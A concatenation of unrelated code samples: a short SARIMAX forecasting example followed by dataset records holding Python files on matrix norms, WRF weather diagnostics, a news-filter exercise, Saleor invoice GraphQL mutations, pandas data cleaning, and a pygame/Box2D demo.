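The predict() method above hinges on one SARIMAX constraint: get_forecast needs an exogenous row for every step being forecast. A minimal synthetic sketch of those shapes (the data and the "temp" regressor are made up for illustration):

import numpy as np
import pandas as pd
from statsmodels.tsa.statespace.sarimax import SARIMAX

rng = np.random.default_rng(0)
idx = pd.date_range("2018-01-01", periods=120, freq="30T")
exog = pd.DataFrame({"temp": rng.normal(size=120)}, index=idx)  # made-up regressor
y = pd.Series(0.5 * exog["temp"].to_numpy() + rng.normal(size=120), index=idx)

res = SARIMAX(y[:100], exog=exog[:100], order=(1, 0, 0)).fit(disp=False)
fcast = res.get_forecast(steps=20, exog=exog[100:])  # one exog row per forecast step
print(fcast.predicted_mean.head())
print(fcast.conf_int().head())  # the same accessors the code above plots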
+{"seq_id":"26658456512","text":"import numpy as np\n\n\ndef get_norma1_for_vector(vector):\n x = 0\n\n for index in range(0, vector.shape[0]):\n x += abs(vector[index])\n\n return x\n\n\ndef get_infinity_normal_for_matrix(matrix):\n x = 0\n for i in range(matrix.shape[0]):\n x = 0\n for j in range(matrix.shape[1]):\n x += abs(matrix[i][j])\n return x\n\n\ndef get_normal1_for_matrix(matrix):\n x = 0\n for i in range(matrix.shape[0]):\n x = 0\n for j in range(matrix.shape[1]):\n x += abs(matrix[j][i])\n return x\n\n\ndef input_matrix():\n rows = int(input(\"Input number of rows: \"))\n col = int(input(\"Input numbers of columns: \"))\n\n matrix = []\n print(\"Input numbers\")\n for i in range(rows):\n a = []\n for j in range(col):\n a.append(input())\n matrix.append(a)\n matrix2 = np.array(matrix, dtype=float)\n return matrix2\n\n\ndef input_vector():\n row = int(input(\"Input length of vector: \"))\n vector = []\n\n print(\"Input numbers\")\n for i in range(row):\n vector.append(input())\n vector2 = np.array(vector, dtype=float)\n\n return vector2\n\n\nif __name__ == '__main__':\n #vector1 = np.array([0.1, 2, -5], dtype=float)\n\n #matrix1 = np.array([[0.1, 2, -5],\n #[5, 1.2, 7],\n #[3, 4, 8]], dtype=float)\n\n vector1 = input_vector()\n matrix1 = input_matrix()\n\n print(vector1, \"\\n\")\n print(matrix1, \"\\n\")\n print(f\"Normal 1 for vector: {get_norma1_for_vector(vector1)}\\tInfinity normal for matrix: \"\n f\"{get_infinity_normal_for_matrix(matrix1)}\\t\"\n f\"Normal 1 for matrix: {get_normal1_for_matrix(matrix1)}\")\n","repo_name":"Singrity/MatrixAndVectorNorms","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"32912534437","text":"\"\"\"\nSome wrappers for Pat Skinner's code in:\nnews_e_post_environment.py\n\nThese OG scripts can be found in my GitHub repo \"objectID\" in /src.\n\"\"\"\nimport pdb\nimport os\nimport time\n\nimport numpy as N\n\nimport evac.derived.pat as pat\n\ndef compute_CAPE(nc=None,P=None,PB=None,PH=None,PHB=None,T=None,QVAPOR=None,QCLOUD=None,\n QRAIN=None,QICE=None,QSNOW=None,QGRAUP=None,PSFC=None,tidx=None):\n \"\"\"\n You need either:\n * nc\n * tidx\n Or:\n * P\n * PB\n * PH\n * PHB\n * T\n * QVAPOR\n * QCLOUD\n * QRAIN\n * QICE\n * QSNOW\n * QGRAUP\n * PSFC\n\n The second group are the WRF \"keys\" for various fields as a mnemonic. These are 3D numpy\n fields, apart from PSFC, which is 2D.\n\n Find the WRF \"key\" meanings here: \n http://www2.mmm.ucar.edu/wrf/users/docs/user_guide_V3/users_guide_chap5.htm#fields\n\n ============\n THE FOLLOWING IS JUST FOR JRL - NOTES\n ============\n We need:\n * t_env - 3d numpy array [z,y,x] of environmental temperature (K)\n * t_parc - 3d numpy array [z,y,x] of lifted parcel temperature (K)\n * p - 3d numpy array [z,y,x] of environmental pressure (hPa)\n * lcl_p - 2d numpy array [y,x] of LCL pressure (hPa)\n * dz - 3d numpy array [y,x] of vertical grid spacing for each grid point (m)\n\n\n Pat does:\n calc_cape(t_v, t_100mb_parcel, p, lcl_p_100mb, dz) \n Where:\n * t_v = calc_thv(temp, qv, qt)\n * temp is calc_t(th,p)\n * p = (p + pb) / 100\n * p and pb (P, PB) from WRF - NEED\n * th is T from WRF, + 300 - NEED\n * qv is QVAPOR from WRF - NEED\n * qt is sum of QCLOUD, QRAIN, QICE, QSNOW, QGRAUP - NEED ALL\n * t_100mb_parcel = calc_parcel_dj(p, th_e_100mb[f,:,:], t_v_100mb, p_100mb)\n * (p)\n * th_e_100mb[f,:,:], lcl_t_100mb = calc_the_bolt(p_100mb, t_100mb, qv_100mb)\n * f is what? forecast time I think...\n * p_100mb = N.ma.average(masked_p, axis=0, weights=dz)\n * masked_p = N.ma.masked_where((p_sfc_temp - p) > 100., (p))\n * p_sfc_temp = PSFC from WRF [0,:,:] / 100 - NEED\n * (p)\n * z, dz = calc_height(ph, phb)\n * PH, PHB from WRF\n * t_100mb = N.ma.average(masked_temp, axis=0, weights=dz)\n * masked_temp = N.ma.masked_where((p_sfc_temp - p) > 100., (temp))\n * qv_100mb = N.ma.average(masked_qv, axis=0, weights=dz)\n * masked_qv = N.ma.masked_where((p_sfc_temp - p) > 100., (qv))\n * t_v_100mb = N.ma.average(masked_t_v, axis=0, weights=dz)\n * masked_t_v = N.ma.masked_where((p_sfc_temp - p) > 100., (t_v))\n * (p_100mb)\n * (p)\n * lcl_p_100mb = 1000. / (th_v_100mb[f,:,:] / lcl_t_100mb)**(1004. 
/ 287.)\n * th_v_100mb[f,:,:] = N.ma.average(masked_th_v, axis=0, weights=dz)\n * masked_th_v = N.ma.masked_where((p_sfc_temp - p) > 100., (th_v))\n * th_v = calc_thv(th, qv, qt)\n * (th) - don't forget the +300\n * (qv)\n * (qt)\n * (lcl_t_100mb)\n * (dz)\n \n \"\"\"\n if nc is not None:\n # only one time\n assert isinstance(tidx,int)\n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n T = nc.variables['T'][tidx,...]\n QVAPOR = nc.variables['QVAPOR'][tidx,...]\n QCLOUD = nc.variables['QCLOUD'][tidx,...]\n QRAIN = nc.variables['QRAIN'][tidx,...]\n QICE = nc.variables['QICE'][tidx,...]\n QSNOW = nc.variables['QSNOW'][tidx,...]\n QGRAUP = nc.variables['QGRAUP'][tidx,...]\n PSFC = nc.variables['PSFC'][tidx,...]\n\n qt = QCLOUD + QRAIN + QICE + QSNOW + QGRAUP\n th = T+300.0\n p = (P+PB)/100.0\n z, dz = pat.calc_height(PH, PHB)\n # pdb.set_trace()\n p_sfc_temp = PSFC/ 100.0\n temp = pat.calc_t(th,p)\n\n t_v = pat.calc_thv(temp, QVAPOR, qt)\n th_v = pat.calc_thv(th, QVAPOR, qt)\n\n masked_p = N.ma.masked_where((p_sfc_temp - p) > 100., (p))\n masked_temp = N.ma.masked_where((p_sfc_temp - p) > 100., (temp))\n masked_qv = N.ma.masked_where((p_sfc_temp - p) > 100., (QVAPOR))\n masked_t_v = N.ma.masked_where((p_sfc_temp - p) > 100., (t_v))\n masked_th_v = N.ma.masked_where((p_sfc_temp - p) > 100., (th_v))\n\n p_100mb = N.ma.average(masked_p, axis=0, weights=dz)\n t_100mb = N.ma.average(masked_temp, axis=0, weights=dz)\n qv_100mb = N.ma.average(masked_qv, axis=0, weights=dz)\n t_v_100mb = N.ma.average(masked_t_v, axis=0, weights=dz)\n\n th_e_100mb, lcl_t_100mb = pat.calc_the_bolt(p_100mb, t_100mb, qv_100mb)\n th_v_100mb = N.ma.average(masked_th_v, axis=0, weights=dz)\n\n t_100mb_parcel = pat.calc_parcel_dj(p, th_e_100mb, t_v_100mb, p_100mb)\n\n lcl_p_100mb = 1000. / (th_v_100mb / lcl_t_100mb)**(1004. / 287.)\n\n CAPE = pat.calc_cape(t_v,t_100mb_parcel,p,lcl_p_100mb,dz)\n # pdb.set_trace()\n # Not masked\n return CAPE.data\n\ndef check_convert_agl(km,check=True):\n if check and (km > 100):\n print(\"Warning: are you sure bottom_km and top_km are in km?\")\n time.sleep(2)\n\n m = km * 1000.0\n return m\n\ndef compute_SRH(nc,tidx,bottom_km=0,top_km=3):\n if nc is not None:\n # only one time\n assert isinstance(tidx,int)\n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n HGT = nc.variables[\"HGT\"][tidx,...] \n U = nc.variables[\"U\"][tidx,...] \n V = nc.variables[\"V\"][tidx,...] \n\n bottom_m = check_convert_agl(bottom_km,check=False)\n top_m = check_convert_agl(top_km)\n p = (P+PB)/100.0\n\n uc = destagger(U,\"U\")\n vc = destagger(V,\"V\")\n\n z, dz = pat.calc_height(PH, PHB)\n z_agl = z - HGT\n\n bunk_r_u, bunk_r_v, bunk_l_u, bunk_l_v = pat.calc_bunkers(p, z_agl, dz, uc, vc)\n srh_0to3 = pat.calc_srh(z_agl, uc, vc, dz, bottom_m, top_m, bunk_r_u, bunk_r_v)\n return srh_0to3.data\n\ndef destagger(arr3d,grid_type):\n assert arr3d.ndim == 3\n if grid_type == \"U\":\n new_arr = (arr3d[:,:,:-1]+arr3d[:,:,1:])/2. \n elif grid_type == \"V\":\n new_arr = (arr3d[:,:-1,:]+arr3d[:,1:,:])/2.\n else:\n raise Exception\n return new_arr\n\ndef compute_shear(nc,tidx,bottom_km=0,top_km=1):\n if nc is not None:\n assert isinstance(tidx,int)\n U = nc.variables[\"U\"][tidx,...] \n V = nc.variables[\"V\"][tidx,...] 
\n P = nc.variables['P'][tidx,...]\n PB = nc.variables['PB'][tidx,...]\n PH = nc.variables['PH'][tidx,...]\n PHB = nc.variables['PHB'][tidx,...]\n HGT = nc.variables[\"HGT\"][tidx,...] \n\n bottom_m = check_convert_agl(bottom_km,check=False)\n top_m = check_convert_agl(top_km)\n p = (P+PB)/100.0\n\n uc = destagger(U,\"U\")\n vc = destagger(V,\"V\")\n\n z, dz = pat.calc_height(PH, PHB)\n z_agl = z - HGT\n\n u_shear, v_shear = pat.calc_wind_shear(z_agl, uc, vc, bottom_m, top_m)\n # shear = (u_shear + v_shear)**2\n # return shear.data\n return u_shear, v_shear\n","repo_name":"johnrobertlawson/evac","sub_path":"evac/derived/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"91"}
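Destaggering in the record above is just averaging adjacent staggered faces onto mass points, which shortens the staggered axis by one. A tiny synthetic shape check of the same arithmetic as `destagger`:

import numpy as np

u_staggered = np.arange(2 * 3 * 4, dtype=float).reshape(2, 3, 4)  # synthetic U-grid field
u_mass = (u_staggered[:, :, :-1] + u_staggered[:, :, 1:]) / 2.0   # average adjacent faces
print(u_staggered.shape, "->", u_mass.shape)  # (2, 3, 4) -> (2, 3, 3)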
+{"seq_id":"21365087963","text":"# PART 3: FILTERING \n\n\nclass WordTrigger(Trigger):\n def __init__(self,word):\n self.word = word\n\n def isWordIn(self,text):\n word = self.word\n word = word.lower()\n text = text.lower()\n\n import string\n for x in string.punctuation:\n word = word.replace(x,\"\")\n text = text.replace(x,\"\")\n word = word.split()\n text = text.split()\n for word in word:\n if word not in text:\n return False\n else:return True\n\n\nclass TitleTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getTitle())\n\n\nclass SubjectTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getSubject())\n\nclass SummaryTrigger(WordTrigger):\n def evaluate(self,story):\n return self.isWordIn(story.getSummary())\n \n \nclass PhraseTrigger(Trigger):\n def __init__(self,phrase):\n self.phrase = phrase\n def evaluate(self,story):\n return self.phrase in story.getSubject() or \\\n self.phrase in story.getTitle() or \\\n self.phrase in story.getSummary()\n \ndef filterStories(stories, triggerlist):\n result = []\n \n for story in stories:\n for trigger in triggerlist:\n if trigger.evaluate(story):\n if story not in result:\n result.append(story)\n \n return result\n \n \n \n \n \n\n","repo_name":"iharsh234/MIT6.00x","sub_path":"pset7-P3-Filtering.py","file_name":"pset7-P3-Filtering.py","file_ext":"py","file_size_in_byte":1478,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"91"}
+{"seq_id":"7666314158","text":"import graphene\nfrom django.core.exceptions import ValidationError\n\nfrom ...core import JobStatus\nfrom ...core.permissions import OrderPermissions\nfrom ...invoice import events, models\nfrom ...invoice.error_codes import InvoiceErrorCode\nfrom ...invoice.notifications import send_invoice\nfrom ...order import events as order_events\nfrom ..core.mutations import ModelDeleteMutation, ModelMutation\nfrom ..core.types.common import InvoiceError\nfrom ..invoice.types import Invoice\nfrom ..order.types import Order\n\n\nclass InvoiceRequest(ModelMutation):\n order = graphene.Field(Order, description=\"Order related to an invoice.\")\n\n class Meta:\n description = \"Request an invoice for the order using plugin.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n class Arguments:\n order_id = graphene.ID(\n required=True, description=\"ID of the order related to invoice.\"\n )\n number = graphene.String(\n required=False,\n description=\"Invoice number, if not provided it will be generated.\",\n )\n\n @staticmethod\n def clean_order(order):\n if order.is_draft() or order.is_unconfirmed():\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot request an invoice for draft or unconfirmed order.\",\n code=InvoiceErrorCode.INVALID_STATUS,\n )\n }\n )\n\n if not order.billing_address:\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot request an invoice for order without billing address.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n }\n )\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n order = cls.get_node_or_error(\n info, data[\"order_id\"], only_type=Order, field=\"orderId\"\n )\n cls.clean_order(order)\n\n shallow_invoice = models.Invoice.objects.create(\n order=order,\n number=data.get(\"number\"),\n )\n invoice = info.context.plugins.invoice_request(\n order=order, invoice=shallow_invoice, number=data.get(\"number\")\n )\n\n if invoice.status == JobStatus.SUCCESS:\n order_events.invoice_generated_event(\n order=order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=invoice.number,\n )\n else:\n order_events.invoice_requested_event(\n user=info.context.user, app=info.context.app, order=order\n )\n\n events.invoice_requested_event(\n user=info.context.user,\n app=info.context.app,\n order=order,\n number=data.get(\"number\"),\n )\n return InvoiceRequest(invoice=invoice, order=order)\n\n\nclass InvoiceCreateInput(graphene.InputObjectType):\n number = graphene.String(required=True, description=\"Invoice number.\")\n url = graphene.String(required=True, description=\"URL of an invoice to download.\")\n\n\nclass InvoiceCreate(ModelMutation):\n class Arguments:\n order_id = graphene.ID(\n required=True, description=\"ID of the order related to invoice.\"\n )\n input = InvoiceCreateInput(\n required=True, description=\"Fields required when creating an invoice.\"\n )\n\n class Meta:\n description = \"Creates a ready to send invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_input(cls, info, instance, data):\n validation_errors = {}\n for field in [\"url\", \"number\"]:\n if data[\"input\"][field] == \"\":\n validation_errors[field] = ValidationError(\n f\"{field} cannot be empty.\",\n code=InvoiceErrorCode.REQUIRED,\n )\n if validation_errors:\n raise 
ValidationError(validation_errors)\n return data[\"input\"]\n\n @classmethod\n def clean_order(cls, info, order):\n if order.is_draft() or order.is_unconfirmed():\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot create an invoice for draft or unconfirmed order.\",\n code=InvoiceErrorCode.INVALID_STATUS,\n )\n }\n )\n\n if not order.billing_address:\n raise ValidationError(\n {\n \"orderId\": ValidationError(\n \"Cannot create an invoice for order without billing address.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n }\n )\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n order = cls.get_node_or_error(\n info, data[\"order_id\"], only_type=Order, field=\"orderId\"\n )\n cls.clean_order(info, order)\n cleaned_input = cls.clean_input(info, order, data)\n invoice = models.Invoice(**cleaned_input)\n invoice.order = order\n invoice.status = JobStatus.SUCCESS\n invoice.save()\n events.invoice_created_event(\n user=info.context.user,\n app=info.context.app,\n invoice=invoice,\n number=cleaned_input[\"number\"],\n url=cleaned_input[\"url\"],\n )\n order_events.invoice_generated_event(\n order=order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=cleaned_input[\"number\"],\n )\n return InvoiceCreate(invoice=invoice)\n\n\nclass InvoiceRequestDelete(ModelMutation):\n class Arguments:\n id = graphene.ID(\n required=True, description=\"ID of an invoice to request the deletion.\"\n )\n\n class Meta:\n description = \"Requests deletion of an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n invoice = cls.get_node_or_error(info, data[\"id\"], only_type=Invoice)\n invoice.status = JobStatus.PENDING\n invoice.save(update_fields=[\"status\", \"updated_at\"])\n info.context.plugins.invoice_delete(invoice)\n events.invoice_requested_deletion_event(\n user=info.context.user, app=info.context.app, invoice=invoice\n )\n return InvoiceRequestDelete(invoice=invoice)\n\n\nclass InvoiceDelete(ModelDeleteMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to delete.\")\n\n class Meta:\n description = \"Deletes an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n invoice = cls.get_instance(info, **data)\n response = super().perform_mutation(_root, info, **data)\n events.invoice_deleted_event(\n user=info.context.user, app=info.context.app, invoice_id=invoice.pk\n )\n return response\n\n\nclass UpdateInvoiceInput(graphene.InputObjectType):\n number = graphene.String(description=\"Invoice number\")\n url = graphene.String(description=\"URL of an invoice to download.\")\n\n\nclass InvoiceUpdate(ModelMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to update.\")\n input = UpdateInvoiceInput(\n required=True, description=\"Fields to use when updating an invoice.\"\n )\n\n class Meta:\n description = \"Updates an invoice.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_input(cls, info, instance, data):\n number = instance.number or data[\"input\"].get(\"number\")\n url = instance.external_url or 
data[\"input\"].get(\"url\")\n\n validation_errors = {}\n if not number:\n validation_errors[\"number\"] = ValidationError(\n \"Number need to be set after update operation.\",\n code=InvoiceErrorCode.NUMBER_NOT_SET,\n )\n if not url:\n validation_errors[\"url\"] = ValidationError(\n \"URL need to be set after update operation.\",\n code=InvoiceErrorCode.URL_NOT_SET,\n )\n\n if validation_errors:\n raise ValidationError(validation_errors)\n\n return data[\"input\"]\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n instance = cls.get_instance(info, **data)\n cleaned_input = cls.clean_input(info, instance, data)\n instance.update_invoice(\n number=cleaned_input.get(\"number\"), url=cleaned_input.get(\"url\")\n )\n instance.status = JobStatus.SUCCESS\n instance.save(update_fields=[\"external_url\", \"number\", \"updated_at\", \"status\"])\n order_events.invoice_updated_event(\n order=instance.order,\n user=info.context.user,\n app=info.context.app,\n invoice_number=instance.number,\n url=instance.url,\n status=instance.status,\n )\n return InvoiceUpdate(invoice=instance)\n\n\nclass InvoiceSendNotification(ModelMutation):\n class Arguments:\n id = graphene.ID(required=True, description=\"ID of an invoice to be sent.\")\n\n class Meta:\n description = \"Send an invoice notification to the customer.\"\n model = models.Invoice\n permissions = (OrderPermissions.MANAGE_ORDERS,)\n error_type_class = InvoiceError\n error_type_field = \"invoice_errors\"\n\n @classmethod\n def clean_instance(cls, info, instance):\n validation_errors = {}\n if instance.status != JobStatus.SUCCESS:\n validation_errors[\"invoice\"] = ValidationError(\n \"Provided invoice is not ready to be sent.\",\n code=InvoiceErrorCode.NOT_READY,\n )\n if not instance.url:\n validation_errors[\"url\"] = ValidationError(\n \"Provided invoice needs to have an URL.\",\n code=InvoiceErrorCode.URL_NOT_SET,\n )\n if not instance.number:\n validation_errors[\"number\"] = ValidationError(\n \"Provided invoice needs to have an invoice number.\",\n code=InvoiceErrorCode.NUMBER_NOT_SET,\n )\n if not instance.order.get_customer_email():\n validation_errors[\"order\"] = ValidationError(\n \"Provided invoice order needs an email address.\",\n code=InvoiceErrorCode.EMAIL_NOT_SET,\n )\n\n if validation_errors:\n raise ValidationError(validation_errors)\n\n @classmethod\n def perform_mutation(cls, _root, info, **data):\n instance = cls.get_instance(info, **data)\n cls.clean_instance(info, instance)\n send_invoice(\n instance, info.context.user, info.context.app, info.context.plugins\n )\n return InvoiceSendNotification(invoice=instance)\n","repo_name":"Saleor-Multi-Vendor/saleor-multi-vendor","sub_path":"saleor/graphql/invoice/mutations.py","file_name":"mutations.py","file_ext":"py","file_size_in_byte":11638,"program_lang":"python","lang":"en","doc_type":"code","stars":117,"dataset":"github-code","pt":"91"}
+{"seq_id":"10360147488","text":"import os\nos.system(\"clear\")\nimport pandas as pd\n\nprint(\"Leer archivo\\n\")\ndf = pd.read_csv(\"dataframe_clase_3_corregido.csv\")\n\nprint(\"Sacar los espacios de las columnas\\n\")\ncolumns = list(df.columns)\nfor n, c in enumerate(df.columns):\n c = c.lstrip() # lstrip remueve caracteres iniciales en blanco\n columns[n] = c.rstrip() # rstrip hace lo mismo con los caracteres finales\ndf.columns = columns\n\nprint(\"Pasar todo a minúsculas y sacar los espacios\\n\")\ndef aMinusculasYSinEspacios(x) :\n if (type(x) == str) :\n return x.lower().lstrip().rstrip()\n else :\n return x\ndf = df.applymap(aMinusculasYSinEspacios)\n\nprint(\"Corregir la columna sexo\\n\")\n\n# Sacando \"Azul\"\ndf = df[df[\"Sexo\"]!=\"azul\"]\n\n# Pasar a minúsculas\ndef parsearSexo(x) :\n if (\"h\" in x) :\n return \"h\"\n elif (\"m\" in x) :\n return \"m\"\n else :\n return \"o\"\ndf[\"Sexo\"] = df[\"Sexo\"].apply(parsearSexo)\n\nprint(\"Arreglar columna LU (libreta universitaria)\\n\")\ndef arregla_LU(x) :\n lista = [\" \", \"-\", \"//\", \"\\\\\", \".\"]\n for l in lista:\n x = x.replace(l, '/')\n return x\ndef sacarCeros(x) :\n xArray = x.split(\"/\")\n return (\"%i%s%i\" % (int(xArray[0]), \"/\", int(xArray[1])))\ndf[\"LU\"] = df[\"LU\"].apply(arregla_LU)\ndf[\"LU\"] = df[\"LU\"].apply(sacarCeros)\n\n\nprint(\"Arreglar columna Observación\\n\")\ndef arreglarObservacion(x):\n if type(x) == str:\n if \"hiper\" in x:\n return \"hipertension\"\n elif \"dolor\" in x and \"cabeza\" in x:\n return \"dolor de cabeza\"\n else:\n return \"ninguna\"\n else:\n return x\n\ndf[\"Observación\"] = df[\"Observación\"].apply(arreglarObservacion)\n\n\nprint(\"Pasar strings \\\"nan\\\" a verdaderos NaN\\n\")\nimport numpy as numpy\ndef pasarNaN(x) :\n if (x == \"nan\") :\n return numpy.NaN\n else :\n return x\ndf = df.applymap(pasarNaN)\n\nprint(\"Sacar promedios NaN\\n\")\ndf.dropna(subset=[\"Promedio\"], inplace=True)\n\nprint(\"Sacar chars de columnas peso y altura\\n\")\ndef sacarChars(x):\n if type(x)==str:\n return ''.join(c for c in x if c.isdigit() or c=='.') # list comprehension\n else:\n return x\ndf[\"Altura\"] = df[\"Altura\"].apply(sacarChars)\ndf[\"Peso\"] = df[\"Peso\"].apply(sacarChars)\n\n\nprint(\"Pasar a float los promedios, el peso y la altura, y pasar a int las edades\\n\")\ndf['Promedio'] = df['Promedio'].apply(float)\ndf['Peso'] = df['Peso'].apply(float)\ndf['Altura'] = df['Altura'].apply(float)\ndf['Edad'] = df['Edad'].apply(int)\n\n\nprint(\"Sacar outliers de peso\\n\")\ndf = df[numpy.logical_and(df[\"Peso\"] >= 35, df[\"Peso\"] <= 180)]\n\n\nprint(\"Calcular ratio de peso y altura por sexo para aproximar los que no tienen altura\\n\")\ndf[\"PesoAlturaRatio\"] = df[\"Peso\"] / df[\"Altura\"]\ndf_h = df[df[\"Sexo\"] == \"h\"]\ndf_m = df[df[\"Sexo\"] == \"m\"]\nmeanH = df_h[\"PesoAlturaRatio\"].mean()\nmeanM = df_m[\"PesoAlturaRatio\"].mean()\n\nprint(\"Calcular aproximación de los que no tienen altura\\n\")\ndf_h_sinAltura = df[ numpy.logical_and(pd.isnull(df[\"Altura\"]), df[\"Sexo\"]==\"h\") ]\ndf_m_sinAltura = df[ numpy.logical_and(pd.isnull(df[\"Altura\"]), df[\"Sexo\"]==\"m\") ]\n\npd.options.mode.chained_assignment = None # default='warn'\n # Pandas tiene una advertencia para asignaciones de este tipo porque son riesgosas\ndf_h_sinAltura[\"Altura\"] = (df_h_sinAltura[\"Peso\"] / meanH).round(2)\ndf_m_sinAltura[\"Altura\"] = (df_m_sinAltura[\"Peso\"] / meanM).round(2)\n\ndf.loc[df_h_sinAltura.index, :] = df_h_sinAltura[:]\ndf.loc[df_m_sinAltura.index, :] = 
df_m_sinAltura[:]\n\n\nprint(\"Dropear columna del ratio\\n\")\ndf.drop(columns=[\"PesoAlturaRatio\"], inplace=True)\n\n\nprint(\"Calcular aproximación de los que no tienen altura\\n\")\ndf.to_csv(\"mi_correccion.csv\", index=False)\n\nprint(df)","repo_name":"aeserein/laboratorio-de-datos-fisica-uba","sub_path":"Clase 03 - Preparación, estandarización, normalización de datos/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":3718,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
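The per-sex imputation above can also be done in one pass with groupby/transform instead of splitting and re-merging the frame; a minimal sketch on a made-up mini-frame:

import numpy as np
import pandas as pd

df = pd.DataFrame({"Sexo": ["h", "h", "m", "m"],
                   "Peso": [80.0, 90.0, 60.0, 55.0],
                   "Altura": [1.80, np.nan, 1.65, np.nan]})
# mean Peso/Altura ratio per sex, broadcast back onto every row
ratio = (df["Peso"] / df["Altura"]).groupby(df["Sexo"]).transform("mean")
df["Altura"] = df["Altura"].fillna((df["Peso"] / ratio).round(2))
print(df)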
+{"seq_id":"14061834488","text":"import pygame\r\nfrom Box2D.b2 import world, polygonShape, circleShape, staticBody, dynamicBody\r\nimport os\r\n\r\nTARGET_FPS = 60\r\nPPM = 20\r\nTIMESTEP = 1.0 / TARGET_FPS\r\n\r\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 400\r\n\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\r\npygame.display.set_caption(\"aaaa\")\r\nclock = pygame.time.Clock()\r\n\r\nworld = world(gravity=(0, -10))\r\nall_sprites = pygame.sprite.Group()\r\nground_body = world.CreateStaticBody(position=(0,0), shapes=polygonShape(box=(50, 1)))\r\n\r\ncolors = {\r\n staticBody: (255, 255, 255, 255),\r\n}\r\n\r\n\r\ndef load_image(name, color_key=None):\r\n fullname = os.path.join('data', name)\r\n try:\r\n image = pygame.image.load(fullname).convert()\r\n except pygame.error as message:\r\n print('Cannot load image:', name)\r\n raise SystemExit(message)\r\n\r\n if color_key is not None:\r\n if color_key == -1:\r\n color_key = image.get_at((0, 0))\r\n image.set_colorkey(color_key)\r\n else:\r\n image = image.convert_alpha()\r\n return image\r\n\r\n\r\ndef my_draw_polygon(polygon, body, fixture):\r\n vertices = [(body.transform * v) * PPM for v in polygon.vertices]\r\n vertices = [(v[0], SCREEN_HEIGHT - v[1]) for v in vertices]\r\n pygame.draw.polygon(screen, colors[body.type], vertices)\r\n\r\n\r\npolygonShape.draw = my_draw_polygon\r\nradius = 20\r\n\r\n\r\nclass Bird(pygame.sprite.Sprite):\r\n image = load_image(\"bird.jpg\")\r\n def __init__(self, *group):\r\n super().__init__(*group)\r\n self.radius = radius\r\n self.rect = self.image.get_rect()\r\n body = world.CreateDynamicBody(position=(20, 20))\r\n self.circle = body.CreateCircleFixture(radius=1, density=1, friction=0.3)\r\n self.rect = pygame.Rect(20, 20, 260, 260)\r\n\r\n def update(self):\r\n self.rect = self.rect.move(0, self.circle.shape.pos[1])\r\n\r\n\r\ndef my_draw_circle(circle, body, fixture):\r\n position = body.transform * circle.pos * PPM\r\n position = (position[0], SCREEN_HEIGHT - position[1])\r\n circle.rect.draw()\r\n\r\n\r\ncircleShape.draw = my_draw_circle\r\n\r\nBird(all_sprites)\r\nrunning = True\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n screen.fill(\"black\")\r\n for body in world.bodies:\r\n for fixture in body.fixtures:\r\n fixture.shape.draw(body, fixture)\r\n world.Step(TIMESTEP, 10, 10)\r\n pygame.display.flip()\r\n clock.tick(TARGET_FPS)","repo_name":"msibir/pygameproject","sub_path":"box2d.py","file_name":"box2d.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
